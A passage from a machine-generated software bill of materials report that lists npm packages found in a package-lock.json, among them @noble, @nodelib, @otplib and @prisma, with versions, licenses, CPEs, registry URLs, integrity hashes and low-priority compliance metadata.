1.2.0 id: 22c53c131692682a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @noble/ciphers 1.3.0' title: '@noble/ciphers 1.3.0' description: 'Package discovered: @noble/ciphers 1.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6d30724fc0ed7cf name: '@noble/ciphers' version: 1.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@noble\/ciphers:\@noble\/ciphers:1.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40noble/ciphers@1.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz integrity: sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d4d3b15cd9ed667f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @noble/hashes 1.8.0' title: '@noble/hashes 1.8.0' description: 'Package discovered: @noble/hashes 1.8.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 447b3d33bb79ef67 name: '@noble/hashes' version: 1.8.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@noble\/hashes:\@noble\/hashes:1.8.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40noble/hashes@1.8.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz integrity: sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 137b4dda2faad400 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @nodable/entities 2.1.0' title: '@nodable/entities 2.1.0' description: 'Package discovered: @nodable/entities 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f8f74773abf739cd name: '@nodable/entities' version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@nodable\/entities:\@nodable\/entities:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40nodable/entities@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz integrity: sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 43aa448b0b5207b8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @nodelib/fs.scandir 2.1.5' title: '@nodelib/fs.scandir 2.1.5' description: 'Package discovered: @nodelib/fs.scandir 2.1.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 09afc93bd06904eb name: '@nodelib/fs.scandir' version: 2.1.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@nodelib\/fs.scandir:\@nodelib\/fs.scandir:2.1.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40nodelib/fs.scandir@2.1.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz integrity: sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g== dependencies: '@nodelib/fs.stat': 2.0.5 run-parallel: ^1.1.9 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 562130ed42946717 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @nodelib/fs.stat 2.0.5' title: '@nodelib/fs.stat 2.0.5' description: 'Package discovered: @nodelib/fs.stat 2.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6979906f7b5cde7 name: '@nodelib/fs.stat' version: 2.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@nodelib\/fs.stat:\@nodelib\/fs.stat:2.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40nodelib/fs.stat@2.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz integrity: sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e2cebc90e3a6fa01 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @nodelib/fs.walk 1.2.8' title: '@nodelib/fs.walk 1.2.8' description: 'Package discovered: @nodelib/fs.walk 1.2.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e11d2a355e0d2438 name: '@nodelib/fs.walk' version: 1.2.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@nodelib\/fs.walk:\@nodelib\/fs.walk:1.2.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40nodelib/fs.walk@1.2.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz integrity: sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg== dependencies: '@nodelib/fs.scandir': 2.1.5 fastq: ^1.6.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 371f10bc801b3e8a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @one-ini/wasm 0.1.1' title: '@one-ini/wasm 0.1.1' description: 'Package discovered: @one-ini/wasm 0.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8d849a9c4c0ebd39 name: '@one-ini/wasm' version: 0.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@one-ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@one-ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@one_ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@one_ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@one:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@one:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40one-ini/wasm@0.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz integrity: sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3c1ae518b93a9e69 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @opentelemetry/api 1.9.1' title: '@opentelemetry/api 1.9.1' description: 'Package discovered: @opentelemetry/api 1.9.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 83e28d5e9e201d09 name: '@opentelemetry/api' version: 1.9.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@opentelemetry\/api:\@opentelemetry\/api:1.9.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40opentelemetry/api@1.9.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz integrity: sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f729f38c8f735bd2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @otplib/core 12.0.1' title: '@otplib/core 12.0.1' description: 'Package discovered: @otplib/core 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4401cb5cafc706d8 name: '@otplib/core' version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@otplib\/core:\@otplib\/core:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40otplib/core@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz integrity: sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aa5d016d75962c38 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @otplib/plugin-crypto 12.0.1' title: '@otplib/plugin-crypto 12.0.1' description: 'Package discovered: @otplib/plugin-crypto 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f17e31d5db2de66e name: '@otplib/plugin-crypto' version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40otplib/plugin-crypto@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz integrity: sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g== dependencies: '@otplib/core': ^12.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 58e5f41c022201bb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @otplib/plugin-thirty-two 12.0.1' title: '@otplib/plugin-thirty-two 12.0.1' description: 'Package discovered: @otplib/plugin-thirty-two 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 104b985242c58dc2 name: '@otplib/plugin-thirty-two' version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40otplib/plugin-thirty-two@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz integrity: sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA== dependencies: '@otplib/core': ^12.0.1 thirty-two: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: de3f341e44725439 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @otplib/preset-default 12.0.1' title: '@otplib/preset-default 12.0.1' description: 'Package discovered: @otplib/preset-default 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 05997a7e636d9fd8 name: '@otplib/preset-default' version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40otplib/preset-default@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz integrity: sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ== dependencies: '@otplib/core': ^12.0.1 '@otplib/plugin-crypto': ^12.0.1 '@otplib/plugin-thirty-two': ^12.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 61834b2dc1830a08 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @otplib/preset-v11 12.0.1' title: '@otplib/preset-v11 12.0.1' description: 'Package discovered: @otplib/preset-v11 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 59bf565b491e939f name: '@otplib/preset-v11' version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40otplib/preset-v11@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz integrity: sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg== dependencies: '@otplib/core': ^12.0.1 '@otplib/plugin-crypto': ^12.0.1 '@otplib/plugin-thirty-two': ^12.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 242a3037b85d7c4e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @pkgjs/parseargs 0.11.0' title: '@pkgjs/parseargs 0.11.0' description: 'Package discovered: @pkgjs/parseargs 0.11.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 060c7b7a8f614664 name: '@pkgjs/parseargs' version: 0.11.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@pkgjs\/parseargs:\@pkgjs\/parseargs:0.11.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40pkgjs/parseargs@0.11.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 83a6bc7b54c525e8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/client 5.22.0' title: '@prisma/client 5.22.0' description: 'Package discovered: @prisma/client 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c440900ad881e975 name: '@prisma/client' version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/client:\@prisma\/client:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/client@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz integrity: sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 888b8378fb32621d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/debug 5.22.0' title: '@prisma/debug 5.22.0' description: 'Package discovered: @prisma/debug 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9f4e1fa5bdb80e5a name: '@prisma/debug' version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/debug:\@prisma\/debug:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/debug@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz integrity: sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1e736006ff85bb23 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/engines 5.22.0' title: '@prisma/engines 5.22.0' description: 'Package discovered: @prisma/engines 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0f98eed7c2a9484e name: '@prisma/engines' version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/engines@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz integrity: sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA== dependencies: '@prisma/debug': 5.22.0 '@prisma/engines-version': 